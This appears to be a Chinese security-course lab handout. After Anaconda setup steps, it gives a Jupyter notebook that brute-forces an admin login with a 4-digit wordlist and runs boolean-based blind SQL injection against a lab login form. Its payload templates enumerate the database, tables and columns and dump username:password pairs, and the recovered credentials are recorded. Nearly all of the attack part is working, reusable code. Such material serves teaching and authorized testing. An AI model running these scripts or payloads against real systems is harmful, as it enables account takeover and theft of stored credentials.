§1.3 Python
下载Anaconda3:
链接:https://pan.baidu.com/s/13sihp9ycrmPzOS78Cpm90Q?pwd=lch1
提取码:lch1
从网盘目录“4.Python/”下载“Anaconda3-2021.11-Windows-x86_64.exe”到D:\ISO
运行前先核对安装包的SHA-256与Anaconda官方归档公布的值是否一致(安装包来自第三方网盘分享,未经校验不要直接执行),再双击Anaconda3-2021.11-Windows-x86_64.exe,安装Anaconda3
启动“Jupyter Notebook (Anaconda3)”
New→Python 3

login&loginPHP.ipynb
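## (1) login site: brute-force the password of user ``admin`` with a wordlist.
##
## NOTE(review): the target is a lab host on a private address; only run this
## against systems you are explicitly authorized to test.
import requests

url = 'http://192.168.112.100/login/login.php'
WORDLIST = "num4.txt"       # one candidate password per line (the course's 4-digit list)
TIMEOUT = 10                # seconds; without it one stalled request hangs the whole run
FAIL_MARKER = 'Login fail'  # text the target returns for a rejected login


def brute_force_password(login_url, wordlist_path, username='admin', timeout=TIMEOUT):
    """Return the first password in *wordlist_path* that logs *username* in, or None.

    The lab form is submitted with GET, so the credentials travel in the query
    string (and end up in the server's access log) -- that is how the target is
    built, not a choice made here.

    Fixes over the first version of this cell: the wordlist is closed, blank
    lines are skipped, each request has a timeout, and reaching the end of the
    wordlist ends the loop instead of re-sending an empty password forever
    (``readline()`` returns '' at EOF, so ``while True`` never terminated).
    """
    # One Session reuses the TCP connection across thousands of attempts.
    with requests.Session() as session, open(wordlist_path, "rt") as wordlist:
        for line in wordlist:
            candidate = line.rstrip("\r\n")
            if not candidate:
                continue
            data = {
                'UserName': username,
                'Password': candidate,
                'submit': '登录',
            }
            res = session.get(login_url, params=data, timeout=timeout)
            # A hit is any response that is NOT the failure page.
            # NOTE(review): an error page (e.g. HTTP 500) would also pass this
            # test; if a "found" password does not work, inspect res.status_code
            # and res.text. The success string for this app is not shown here.
            if FAIL_MARKER not in res.text:
                return candidate
    return None  # wordlist exhausted without a hit


# Jupyter runs cells with __name__ == "__main__", so the cell still executes.
if __name__ == "__main__":
    found = brute_force_password(url, WORDLIST)
    if found is None:
        print("password not found in wordlist")
    else:
        print(found)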
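## (2) loginPHP site: recover the password of user ``wl190514`` with a
## boolean-based blind SQL injection in the ``usernm`` field.
import requests

url = 'http://192.168.112.100/loginPHP/loginAuth.php'
# %s placeholders: 1-based character position, then the ASCII code under test.
# The trailing '#' comments out the remainder of the server-side query.
payload1 = "wl190514' and (ascii(substr(password,%s,1))=%s)#"
TIMEOUT = 10                     # seconds per request
SUCCESS_MARKER = 'Login Success!' # text the target returns when the injected condition is true


def extract_blind(login_url, template, max_len=20, charset=range(32, 127), timeout=TIMEOUT):
    """Return the string recovered through the boolean oracle at *login_url*.

    For each position 1..max_len every code in *charset* is tried until the
    target answers with the success page.  A position where no code matches is
    taken as the end of the string (MySQL ``substr`` past the end yields '',
    whose ``ascii`` is 0), so the loop stops there instead of spending another
    len(charset) requests on every remaining position.

    NOTE(review): a character outside *charset* (e.g. a non-ASCII byte) also
    ends the extraction early; widen the charset if the result looks truncated.
    """
    recovered = ''
    with requests.Session() as session:
        for pos in range(1, max_len + 1):
            print('------------------')
            print(pos)
            for code in charset:
                data = {
                    'usernm': template % (pos, code),
                    'passwd': 'any',
                }
                r = session.post(login_url, data=data, timeout=timeout)
                # Match the success page positively.  The earlier test,
                # ``not 'Login Failure!' in r.text``, also counted any error
                # page (e.g. HTTP 500) as a hit and corrupted the result.
                if SUCCESS_MARKER in r.text:
                    recovered += chr(code)
                    print(recovered)
                    break
            else:
                break  # no code matched at this position: end of string
    return recovered


# Jupyter runs cells with __name__ == "__main__", so the cell still executes.
if __name__ == "__main__":
    res = extract_blind(url, payload1)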
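## (3) loginPHP site: enumerate database, tables, columns and rows through the
## same boolean-based blind injection.
##
## The templates below were used one after another during the lab; the value
## each one recovered is recorded under it.  Only the last template is active.
import requests

url = 'http://192.168.112.100/loginPHP/loginAuth.php'

# ---- database name --------------------------------------------------------
# payload = "1' and (ascii(substr((database()),%s,1))=%s)#"
#   -> database(): mydb
# ---- DBMS version ---------------------------------------------------------
# payload = "1' and (ascii(substr((version()),%s,1))=%s)#"
#   -> version(): 5.5.68-MariaDB
# payload = "1' and (ascii(substr( (select (version())) ,%s,1))=%s)#"   # works as well
# payload = "1' and (ascii(substr( (concat(0x7e,(version()),0x7e)) ,%s,1))=%s)#"   # version() wrapped in '~' (0x7e)
# ---- table names ----------------------------------------------------------
# payload = "1' and (ascii(substr( (select table_name from information_schema.tables where table_schema=database()) ,%s,1))=%s)#"
#   table names of the current database()
# payload = "1' and (ascii(substr( (select table_name from information_schema.tables where table_schema='mydb' limit 0,1) ,%s,1))=%s)#"
#   first table name of database "mydb"
# payload = "1' and (ascii(substr( (select table_name from information_schema.tables where table_schema='mydb' limit 1,1) ,%s,1))=%s)#"
#   second table name of database "mydb"
# payload = "1' and (ascii(substr( (select group_concat(table_name) from information_schema.tables where table_schema='mydb') ,%s,1))=%s)#"
#   all table names of database "mydb"
# payload = "1' and (ascii(substr( (select group_concat(table_name) from information_schema.tables where table_schema=database()) ,%s,1))=%s)#"
#   all table names of the current database()
#   -> tables in mydb: users
# ---- column names ---------------------------------------------------------
# payload = "1' and (ascii(substr( (select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users') ,%s,1))=%s)#"
#   all column names of table "users" in the current database()
#   -> columns of mydb.users: id,username,password
# ---- rows -----------------------------------------------------------------
payload = "1' and (ascii(substr( (select group_concat(username,':',password) from users) ,%s,1))=%s)#"
#   username:password pairs of table "users"
#   -> rows of users: 2:2,1:1,wl190514:7df2cac4

TIMEOUT = 10                      # seconds per request
SUCCESS_MARKER = 'Login Success!'  # a successful login returns "Login Success!"


def extract_blind(login_url, template, max_len=30, charset=range(32, 127), timeout=TIMEOUT):
    """Return the string recovered through the boolean oracle at *login_url*.

    For each position 1..max_len every code in *charset* is tried until the
    target answers with the success page.  A position where no code matches is
    taken as the end of the string (MySQL ``substr`` past the end yields '',
    whose ``ascii`` is 0), so the loop stops there instead of spending another
    len(charset) requests on every remaining position.

    NOTE(review): ``group_concat`` output longer than *max_len* is silently cut
    off; raise max_len if the last recovered character is not the end of a row.
    """
    recovered = ''
    with requests.Session() as session:
        for pos in range(1, max_len + 1):
            print('--------------------')
            print(pos)
            for code in charset:
                data = {
                    # field names from the login.php form: name="usernm", name="passwd"
                    'usernm': template % (pos, code),
                    'passwd': 'any',
                }
                # the login.php form uses method="post"
                r = session.post(login_url, data=data, timeout=timeout)
                if SUCCESS_MARKER in r.text:
                    recovered += chr(code)
                    print(recovered)
                    break
            else:
                break  # no code matched at this position: end of string
    return recovered


# Jupyter runs cells with __name__ == "__main__", so the cell still executes.
if __name__ == "__main__":
    res = extract_blind(url, payload)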
运行:Ctrl+Enter
【教学资源】
(1)4位数字的字典:num4.txt
(2)Jupyter Notebook格式的Python源文件:login&loginPHP.ipynb

